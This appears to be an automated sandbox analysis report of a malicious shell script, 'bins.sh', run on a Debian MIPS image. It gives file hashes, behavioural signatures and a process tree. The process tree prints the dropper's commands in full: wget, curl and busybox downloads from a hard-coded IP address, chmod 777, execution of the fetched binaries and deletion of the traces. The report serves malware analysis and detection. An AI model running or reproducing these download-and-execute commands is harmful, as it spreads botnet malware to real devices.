Analysis

  • max time kernel
    122s
  • max time network
    116s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    27-10-2024 21:13

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    7b4d271e102cd41b604d6fea5d979e2d

  • SHA1

    56b5d99bae8b5353d96d700fda3d30d396cc9828

  • SHA256

    56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91

  • SHA512

    ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5

  • SSDEEP

    192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:706
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:709
        • /usr/bin/wget
          wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Writes file to tmp directory
          PID:714
        • /usr/bin/curl
          curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:725
        • /bin/busybox
          /bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Writes file to tmp directory
          PID:735
        • /bin/chmod
          chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • File and Directory Permissions Modification
          PID:736
        • /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          ./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Executes dropped EXE
          PID:737
        • /bin/rm
          rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
            PID:740
          • /usr/bin/wget
            wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Writes file to tmp directory
            PID:741
          • /usr/bin/curl
            curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:742

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

          Filesize

          100KB

          MD5

          3b78bb645b81d600c30713d416f666be

          SHA1

          23796112f2cce2afb2217498b5ecf2801ab550f2

          SHA256

          d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

          SHA512

          9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

        • /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

          Filesize

          101KB

          MD5

          a7e686eb3f74b104a5520f08cfd54eb5

          SHA1

          58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

          SHA256

          617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

          SHA512

          2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

        • /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

          Filesize

          40KB

          MD5

          d59ca30fc049e0b93ea6e5fa3a43d3ba

          SHA1

          2942d8c5b503862f4f841c80fddff739bc439cb8

          SHA256

          2cd178aa473e15b45b1581d14ef1568ed847c5e355ce6a92e6c59e8a972a9555

          SHA512

          924b6ce3c1708932413f73cd43e153f74fc7a72ad4ce527414723627a506976748ca69b01ef767510332789d900d91adf9b746cea47579c369ae35738f5ab9fe